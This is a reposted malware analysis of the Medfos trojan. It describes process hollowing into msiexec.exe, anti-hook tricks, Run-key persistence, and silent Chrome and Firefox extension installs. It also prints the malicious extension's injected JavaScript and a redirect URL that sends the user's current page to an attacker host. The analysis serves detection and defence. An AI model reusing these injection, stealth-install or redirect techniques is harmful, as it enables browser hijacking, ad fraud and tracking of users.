HackDig : Dig high-quality web security articles for hacker

Medfos: An All-purpose Redirector

2014-08-10 13:30

[

This article originally appeared in Virus Bulletin

](http://www.virusbtn.com/virusbulletin/archive/2014/01/vb201401-Medfos)

<br/>

Medfos is a heavily obfuscated trojan family which downloads modules capable of redirecting search engine results in the most popular browsers, including Chrome, Firefox and Internet Explorer. Its main module, the downloader, was found to be distributed via the Sasfis botnet. This article dissects the way the Medfos downloader deploys its downloaded modules, and the function of each.

<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">THE DLL DOWNLOADER</h3>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The outermost layer of the Medfos downloader behaves as a code injector to the msiexec.exe process, where it performs its main payload. The assembly code is heavily obfuscated. It uses a combination of encrypted strings, dummy calls, junk code and opaque predicates to cause <i>IDA </i>functions to be chopped up inaccurately in the default setting, and causes the function graph overview window to be too complex to navigate accurately if the 'Create functions if call is present' option is turned off.</p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">First, Medfos obtains the handle of %system%/msiexec.exe by calling NtOpenFile. Prior to creating a process using the newly acquired file handle, the ZwCreateSection and NtMapViewOfSection routines are called to obtain a mapped view of msiexec.exe where the malware prepares and inserts decoded chunks of malicious code.</p>
<!--First figure appears hear-->
<p style="text-indent: 0pt;text-align: left;"><span><img width="415" height="251" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos1.png"/></span></p>
<p class="s3" style="padding-left: 0pt;text-indent: 0pt;text-align: center;">Figure 1: Anti-API hook.</p>

<p style="padding-left: 5pt;text-indent: 0pt;text-align: left;">CreateProcessInternalW is then used to create an instance of the msiexec.exe process in a suspended state. In between the typical NtGetContextThread and NtResumeThread API calls, the code injection is performed by two NtMapViewOfSection calls. The first NtMapViewOfSection call maps the bulk of the malicious code into the suspended process, while the second changes the entry point bytes of the suspended process to a jump into the malicious code.</p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">As the host process resumes the thread of the injected msiexec.exe, the injected process will perform its function as a downloader. It resolves some critical APIs and employs an anti-API hooking technique. As shown in Figure 1, the first five instructions of InternetOpenURL are copied to an allocated space at memory location 0x9400A0. When the trojan calls InternetOpenURL, it calls location 0x9400A0, which is followed by a jump to the sixth instruction of the original InternetOpenURL call, 0x771C5A6A. Thus, it avoids the API hook that hooks the first five instructions of the original call.</p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">After some preparation, the downloader checks for network connectivity by attempting to connect to <i>Google</i><a href="http://www.microsoft.com/" class="a" target="_blank">. If a network connection is verified, it issues a DNS query to cdn169.filesnetupload.com, which at the time of writing this article, returns the IP 78.140.131.159. However, the malware subsequently connects to the C&amp;C server at 78.131.140.159 and reads a maximum of 0x108FF0 bytes of data. The IP of the server is a string decrypted at runtime, and the DNS query is probably a smoke screen intended to distract users and malware analysts. As shown in Figure 2, when communicating with the C&amp;C server, the host is set as </a>www.microsoft.com to further confuse the user. The data sent to the server is a hard-coded string pretending to be downloading a file from a legitimate site which has nothing to do with the C&amp;C server.</p>

<p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The response from the C&amp;C server is encrypted with a simplified version of the Tiny Encryption Algorithm (TEA), with all four cache keys hard-coded to be 0x12345678. As illustrated in Figure 3 and Table 1, the server response contains two structures, each with a five-DWORD header and the body content of a portable executable (PE).</p>

<p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">Note that, as shown in Figure 3 and Table1, the fourth DWORD is the hash of the DLL export name, which will be called by the downloader and the run key set up by the DLL itself. The downloaded DLL may be different each time as the server always responds with the newest variant.</p>

<p style="padding-top: 5pt;padding-left: 6pt;text-indent: 0pt;text-align: left;"><img width="351" height="256" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos2.png"/></p>
<p style="text-indent: 0pt;line-height: 10pt;text-align: left;"><br/></p><p class="s3" style="padding-top: 5pt;padding-left: 24pt;text-indent: 0pt;text-align: center;"><a href="http://www.microsoft.com/" class="s4" target="_blank">Figure 2: The host is set to </a>www.microsoft.com, but the Get message is sent to IP 78.140.131.159.</p>

<p style="padding-top: 6pt;padding-left: 5pt;text-indent: 0pt;text-align: left;"><span><img width="351" height="239" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos3.png"/></span></p><p class="s3" style="padding-top: 5pt;padding-left: 6pt;text-indent: 0pt;text-align: center;">Figure 3: Decoded responses.</p>

<p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The downloaded DLL is loaded and initialized using ntdll.LdrLoadDll(). While most parts of the DLLs are encrypted, initializing the DLLs performs the decryption. To start the payload of the downloaded DLLs, the export defined by the fourth DWORD is called. When called within the host Medfos downloader, a constant is pushed as the argument to the export function. By matching the argument with the constant, the downloaded module is able to determine whether it is being invoked 'legitimately'. Called within the downloader, the DLL first drops a copy of itself into %Application Data% with a name consisting of six randomly generated alphabet characters. Then it adds the following key in the registry entry under 'SOFTWARE MicrosoftWindowsCurrentVersionRun' to make sure it is executed at start up:</p>

<p style="padding-top: 4pt;padding-left: 11pt;text-indent: 0pt;text-align: left;">&lt;DLL name&gt; = rundll32.exe &lt;DLL path and DLL name&gt;,</p>

<p style="padding-left: 11pt;text-indent: 0pt;text-align: left;">&lt;ExportName&gt;</p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">Just before returning from the export function, to execute the DLL, CreateProcessW is called with the same rundll32.exe command line as the registry key just created.</p>
<!--new heading-->

<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">DLL MODULE - REDIRECTOR</h3>
<!--end of new heading-->

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">One of the downloaded DLL modules is a search result redirector for <i>Google Chrome</i>, <i>Mozilla Firefox </i>and <i>Internet Explorer</i>. Figure 4 shows search result redirection behaviour under <i>Internet Explorer</i>, while Figure 5 displays the network traffic generated during the multi-stage redirection process. As we have mentioned, loading the DLL module decrypts the DLL, and the decrypted DLL module is equipped with a different style of code obfuscation technique from its downloader. The strings are decrypted only immediately prior to their use and are erased straight after use. The APIs are also resolved only at runtime.</p>

<!--heading start-->
<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">CHROME REDIRECT</h3>
<!--heading end-->

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">After the redirector DLL module is executed, it drops and installs a .crx <i>Google Chrome </i>extension package.</p><p style="text-indent: 0pt;line-height: 14pt;text-align: left;"><br/></p>

<!--table start-->
<table style="border-collapse:collapse;width:487pt;margin-left:22.05pt" cellspacing="0"><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s5" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">DWORD</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s5" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Use</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s5" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Note</p></td></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">1</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Reserved</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Not used</p></td></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 6pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">2</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;padding-right: 22pt;text-indent: 0pt;text-align: left;">A checksum of the PE contained in the current structure</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 6pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">The checksum is a simple summation of all bytes in the PE</p></td></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">3</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Size of the PE in current structure</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"/></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p style="text-indent: 0pt;line-height: 7pt;text-align: left;"><br/></p><p class="s6" style="padding-left: 3pt;text-indent: 0pt;text-align: left;">4</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p style="text-indent: 0pt;line-height: 7pt;text-align: left;"><br/></p><p class="s6" style="padding-left: 3pt;text-indent: 0pt;text-align: left;">Hash of export name to be called</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;padding-right: 97pt;text-indent: 0pt;line-height: 143%;text-align: left;">The checksum pseudo algorithm: For C = each character in NAME,</p><p class="s6" style="padding-left: 12pt;text-indent: 0pt;text-align: left;">CKM = CKM ror 7</p><p class="s6" style="padding-top: 4pt;padding-left: 12pt;text-indent: 0pt;text-align: left;">CKM = CKM ^ C</p></td></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">5</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">End of this structure</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">Absolute number of bytes from the beginning of buffer</p></td></tr><tr><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">6+</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"><p class="s6" style="padding-top: 1pt;padding-left: 3pt;text-indent: 0pt;text-align: left;">The PE bytes</p></td><td style="border-top-style:solid;border-top-width:1pt;border-top-color:#231F20;border-left-style:solid;border-left-width:1pt;border-left-color:#231F20;border-bottom-style:solid;border-bottom-width:1pt;border-bottom-color:#231F20;border-right-style:solid;border-right-width:1pt;border-right-color:#231F20"/></tr></table>
<!--table end-->

<p class="s3" style="padding-top: 2pt;padding-left: 183pt;text-indent: 0pt;text-align: left;">Table 1: Structure of the decoded response.</p>

<!--figure 4-->
<p style="text-indent: 0pt;line-height: 6pt;text-align: left;"><br/></p><p style="padding-left: 76pt;text-indent: 0pt;text-align: left;"><span><img width="458" height="266" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos4.png"/></span></p>

<p class="s3" style="padding-top: 6pt;padding-left: 44pt;text-indent: 0pt;text-align: center;">Figure 4: Search result redirection. Notice that the topic of the redirected page is related to the search term.</p>
<!--end figure-->

<!--figure 5-->
<p style="text-indent: 0pt;line-height: 12pt;text-align: left;"><br/></p><p style="padding-left: 29pt;text-indent: 0pt;text-align: left;"><span><img width="579" height="370" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos5.png"/></span></p>
<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><p class="s3" style="padding-left: 44pt;text-indent: 0pt;text-align: center;">Figure 5: Result of clicking on a link after searching for the term 'penny stock'.</p>
<!--end figure-->

<p style="text-indent: 0pt;line-height: 6pt;text-align: left;"><br/></p><p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The extension package is first decoded and dropped into %AdministratorLocal SettingsApplication Data% with a randomly generated name in GUID (globally unique identifier) format. Then, to trigger installation of the Chrome <span class="p">extension, the following registry key is added [1]:</span></p>

<p style="padding-top: 0pt;padding-left: 11pt;text-indent: 0pt;text-align: left;">HKLMSoftwareGoogleChromeExtensions&lt;32 randomly generated lower case characters&gt;</p>

<p style="padding-top: 0pt;padding-left: 11pt;text-indent: 0pt;text-align: left;">path = &lt;full path of the .crx file&gt;</p>

<p style="padding-top: 0pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The strings contained in the <i>Chrome </i>extension scripts are encoded. The pseudo code of the decryption routine is as follows:</p>

<!--inline code-->
<p class="s7" style="padding-top: 0pt;padding-left: 23pt;text-indent: 0pt;line-height: 141%;text-align: left;">Key = 0; </p>
<p class="s7" style="padding-top: 0pt;padding-left: 23pt;text-indent: 0pt;line-height: 141%;text-align: left;">OutString = "";</p>
<p class="s7" style="padding-left: 10pt;text-indent: 0pt;text-align: left;">For Byte in Input:</p><p class="s7" style="padding-top: 0pt;padding-left: 40pt;text-indent: 0pt;text-align: left;">Byte = Byte ^ (Key&amp;0xFF);</p><p class="s7" style="padding-top: 0pt;padding-left: 40pt;text-indent: 0pt;line-height: 141%;text-align: left;">OutString = OutString + toChar(Byte); Key++;</p><p class="s7" style="padding-left: 23pt;text-indent: 0pt;text-align: left;">End For</p><p class="s7" style="padding-top: 0pt;padding-left: 23pt;text-indent: 0pt;text-align: left;">Return OutString;</p>
<!--end inline code-->

<p style="padding-top: 0pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The Appendix [2] contains the de-obfuscated equivalent of the scripts contained within the .crx package. Once installed, the extension parses the document.location.href using regular expression matching. Depending on the situation, one of the following two actions might be triggered:</p>

<p style="padding-top: 0pt;padding-left: 22pt;text-indent: -14pt;text-align: left;">If <i>Google Instant </i>search is detected, the script injected is:</p>

<p style="padding-top: 0pt;padding-left: 22pt;text-indent: 0pt;text-align: left;"><a href="http://disable-instant-search.com/js/disable.js" class="s8" target="_blank">http://disable-instant-search.com/js/disable.js</a></p>

<p style="padding-top: 0pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">This contains the following JavaScript:</p>

<p class="s7" style="padding-top: 0pt;padding-left: 10pt;text-indent: 0pt;text-align: left;">try {</p><p class="s7" style="padding-top: 3pt;padding-left: 22pt;text-indent: 0pt;line-height: 141%;text-align: left;">var Links = document.getElementsByTagName('a'); var f = 0;</p>
<p class="s7" style="padding-left: 47pt;text-indent: 0pt;text-align: left;">for (var i = 0; f == 0 &amp;&amp; i &lt; Links.length; i++) { if (Links[i].href.indexOf ('/setprefs?') != -1) { var t =Links[i].href.search(/sig=([^&amp;]+)/);</p>
<p class="s7" style="padding-left: 47pt;text-indent: 0pt;text-align: left;">if (t) {</p>
<p class="s7" style="padding-top: 3pt;padding-left: 58pt;text-indent: 0pt;text-align: left;">t = RegExp.$1;</p>
<p class="s7" style="padding-top: 3pt;padding-left: 58pt;text-indent: 0pt;line-height: 141%;text-align: left;">t = '/setprefs?&amp;sig=' + t + '&amp;suggon=2'; var req = new XMLHttpRequest(); req.open('GET', t);</p>
<p class="s7" style="padding-left: 58pt;text-indent: 0pt;line-height: 141%;text-align: left;">req.send(); </p>
<p class="s7" style="padding-left: 58pt;text-indent: 0pt;line-height: 141%;text-align: left;">f = 1;</p>
<p class="s7" style="padding-left: 47pt;text-indent: 0pt;text-align: left;">}</p>
<p class="s7" style="padding-top: 3pt;padding-left: 34pt;text-indent: 0pt;text-align: left;">}</p>
<p class="s7" style="padding-top: 3pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">}</p>
<p class="s7" style="padding-top: 3pt;padding-left: 10pt;text-indent: 0pt;text-align: left;">} catch (err) {}</p>

<p style="padding-top: 4pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">If a link to a search result of one of the major search engines is identified, the injected script would be:</p>
<p class="s7" style="padding-top: 4pt;padding-left: 10pt;text-indent: 0pt;text-align: left;">ss+"?type="+k3+"&amp;user-agent=Mozilla%2 F5.0+%28Windows+NT+5.1%29+AppleWebKit%2F534.30+%28KHTML%2C+like+Gecko%29+C hrome%2F12.0.742.112+Safari%2F534.30&amp;ip="+p+"&amp;ref="+encodeURIComponent(k2)+'&amp;'+kladsjnkf</p>

<p style="padding-top: 4pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">Where:</p>
<p style="padding-top: 4pt;padding-left: 22pt;text-indent: 0pt;text-align: left;"><a href="http://chrome-revision.com/feed" class="s4" target="_blank">ss </a><a href="http://chrome-revision.com/feed" class="a" target="_blank">= 'http://chrome-revision.com/feed'</a></p><p class="s3" style="padding-top: 4pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">k3 <span class="p">= 'search' if searching in </span>Google<span class="p">,</span></p><p class="s3" style="padding-left: 22pt;text-indent: 0pt;text-align: left;">Yahoo!<span class="p">, </span>Ask<span class="p">, </span>Bing <span class="p">or </span>AOL</p><p class="s3" style="padding-top: 4pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">k3 <span class="p">= 'empty' if visiting </span>Yahoo!<span class="p">, </span>Bing<span class="p">, </span>Ask <span class="p">or </span>AOL <span class="p">but not searching</span></p>
<p class="s3" style="padding-top: 3pt;padding-left: 22pt;text-indent: 0pt;text-align: left;">k2 <span class="p">= the current URL</span></p>
<p class="s3" style="padding-top: 4pt;padding-left: 5pt;text-indent: 17pt;text-align: left;">p <span class="p">= a randomly generated IP address starting with 84.</span></p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The <a href="http://googleads.i.doublee-click.net/" class="a" target="_blank">'http://chrome-revision.com/feed' may also return a gzipped script which redirects the page to </a><a href="http://googleads/" class="a" target="_blank">'http://googleads.i.doublee-click.net', as shown in the Appendix [2]. At this point, the server at </a>'http://googleads. i.doublee-click.net' might decide to further redirect the browser to another domain. The choice of redirected</p><p style="padding-left: 5pt;text-indent: 0pt;text-align: left;"><a href="http://googleads.i.doublee-click.net/" class="a" target="_blank">target depends on the search term. During the redirecting procedure, the browsing footprint is referred to a legitimate advertisement domain to simulate fake ad-clicks to generate revenue for the author. The network traffic of such </a>a process generated by 'http://googleads.i.doublee-click.net' is illustrated in Figure 5.</p><p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">FIREFOX REDIRECT</h3><p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">If <i>Mozilla Firefox </i>is found to be installed, a <i>Firefox </i>extension performing the same function as the <i>Chrome </i>extension will also be installed. The script contained within the extension is essentially <i>Firefox </i>syntax of the same script as the <i>Chrome </i>extension. As <i>Firefox </i>does not officially advertise a method to install an extension without user confirmation, a more stealthy approach is taken here. To install the <i>Firefox </i>extension, the DLL module loads and calls the mozsqlite3.dll library to allow direct modification of the database behind the <i>Firefox </i>browser. To be exact,</p>
<p style="padding-left: 5pt;text-indent: 0pt;text-align: left;">it calls sqlite3_open16 to open the <i>Firefox </i>database, followed by a series of sqlite3_exec SQL statements, as shown in Figure 5, to set up the installation [3]. The DLL module drops the file %&lt;Firefox extension folder&gt;%&lt;randomly generated GUID&gt;.xpi to complete the installation of the extension. Note that the GUID entered into the <i>Firefox </i>sqlite database must match the filename of the .xpi file, as shown in Figures 6 and 7.</p>





<!--image-->
<p style="text-indent: 0pt;text-align: left;"><span><img width="424" height="69" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos6.png"/></span></p>
<!--image-->
<!--caption -->
<p style="text-indent: 0pt;line-height: 12pt;text-align: left;"><br/></p><p class="s3" style="padding-left: 91pt;text-indent: -72pt;text-align: left;">Figure 6: Sqlite3_exec to include required information for Firefox to load an extension. GUID is highlighted in red.</p>
<!--end cap-->
<!--image-->
<p style="text-indent: 0pt;line-height: 10pt;text-align: left;"><br/></p><p style="padding-left: 4pt;text-indent: 0pt;text-align: left;"><span><img width="425" height="165" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos7.png"/></span></p>
<!--end image-->
<!--caption-->
<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><p class="s3" style="padding-left: 19pt;text-indent: 0pt;text-align: left;">Figure 7: Creating/dropping the actual .xpi file. GUID is highlighted in red.</p>
<!--end cap-->

<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">INTERNET EXPLORER REDIRECT</h3>

<p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The DLL module also implements a similar ad-clicking and redirecting behaviour for <i>Internet Explorer</i>. However, the implementation for <i>IE </i>is a little more involved. First, using CoInitialize and CoCreateInstance, an instance of iexplore.exe is created. Note that this instance of iexplore.exe lurks in the background without a visible window. SetWindowsHookExW is then called with idHook set to WH_GETMESSAGE and HOOKPROC pointing to a harmless container subroutine that eventually calls CallNextHook.</p><p style="padding-left: 5pt;text-indent: 0pt;text-align: left;">The hooked function need not be malicious because the function of this <i>Windows </i>hook is to load the DLL module into the lurking iexplore.exe process and, as an artifact, into all other active processes that monitor messages using either PeekMessage or GetMessage. Once the injection is in place, UnhookWindowsHookEx is called to clean up the hook.</p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">In addition to the search result redirection performed through the server at 'googleads.doublee-click.net', as illustrated in Figures 4 and 5, the lurker iexplore.exe simulates another ad-clicking action to generate an additional stream of revenue. Figure 9 shows an instance where the URL for a <i>Google </i>search result page is referenced to the additional online advertisement domain. </p>

<!--image-->
<p style="text-indent: 0pt;line-height: 10pt;text-align: left;"><br/></p><p style="padding-left: 5pt;text-indent: 0pt;text-align: left;"><span><img width="457" height="307" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos8.png"/></span></p>
<!--cap-->
<p class="s3" style="padding-top: 6pt;padding-left: 6pt;text-indent: 0pt;text-align: center;">Figure 8: SetWindowsHookExW sets the set_gAMA_fixed export function as HOOKPROC parameter.</p>
<!--end cap-->
<!--img-->
<p style="text-indent: 0pt;line-height: 10pt;text-align: left;"><br/></p><p style="padding-left: 12pt;text-indent: 0pt;text-align: left;"><span><img width="440" height="102" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos9.png"/></span></p>
<!--end img-->
<!--cap-->
<p class="s3" style="padding-top: 6pt;padding-left: 9pt;text-indent: 0pt;text-align: center;">Figure 9: Redirection with InternetOpenUrlW while searching for the keyword 'stock' in Google. Notice that there is an IP prepended to the normal Google search URL.</p>
<!--end cap-->
<p style="text-indent: 0pt;line-height: 7pt;text-align: left;"><br/></p><p style="padding-left: 118pt;text-indent: 0pt;line-height: 11pt;text-align: left;">As for the redirector DLL module that we have discussed, its ad-clicker functionality provides a method to generate revenue. It is also possible that the author is using the search engine usage information gathered for some other purpose. While the <i>Internet Explorer </i>version of the redirect/ ad-clicker functionality causes a major and noticeable slow down in the browser, the <i>Firefox </i>and <i>Google Chrome</i> extensions are both simple and reliable.</p>

<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/>

<!--conclusion-->
</p><h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">CONCLUSION</h3><p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The design of the Medfos trojan provides great modularity and extensive security for the DLL modules that it distributes. It is also able to download and deploy an arbitrary number of DLL modules.</p><p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">REFERENCES</h3><p style="padding-top: 5pt;padding-left: 36pt;text-indent: -26pt;text-align: left;"><a href="http://developer.chrome.com/extensions/external_" class="a" target="_blank">[1] </a>http://developer.chrome.com/extensions/external_ extensions.html.</p><p style="padding-top: 5pt;padding-left: 36pt;text-indent: -26pt;text-align: left;"><a href="http://www.virusbtn.com/virusbulletin/" class="a" target="_blank">[2] </a>http://www.virusbtn.com/virusbulletin/ archive/2014/01/vb201401-Medfos-appendix.</p><p style="padding-top: 5pt;padding-left: 36pt;text-indent: -26pt;text-align: left;"><a href="http://research.zscaler.com/2012/09/how-to-install-" class="a" target="_blank">[3] </a>http://research.zscaler.com/2012/09/how-to-install- silently-malicious.html.</p>

<style type="text/css">

.s1 { color: #000000; font-family:Arial, sans-serif; font-style: italic; font-weight: normal; text-decoration: none; font-size: 10pt; } .s2 { color: #000000; font-family:Arial, sans-serif; font-style: normal; font-weight: normal; text-decoration: none; font-size: 10pt; } .s3 { color: #000000; font-family:"Times New Roman", serif; font-style: italic; font-weight: normal; text-decoration: none; font-size: 9.5pt; } .s6 { color: #000000; font-family:"Times New Roman", serif; font-style: normal; font-weight: normal; text-decoration: none; font-size: 9.5pt; } .s7 { color: #000000; font-family:"Courier New", monospace; font-style: normal; font-weight: normal; text-decoration: none; font-size: 10pt; } .s8 { color: #000000; font-family:"Courier New", monospace; font-style: normal; font-weight: normal; text-decoration: none; font-size: 10pt; }

To download this and other great articles, please visit Virus Bulletin


Source: rotcerider-esoprup-lla-na-sofdem/tsop/moc.tenitrof.golb

Read:2252 | Comments:0 | Tags:No Tag

“Medfos: An All-purpose Redirector”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud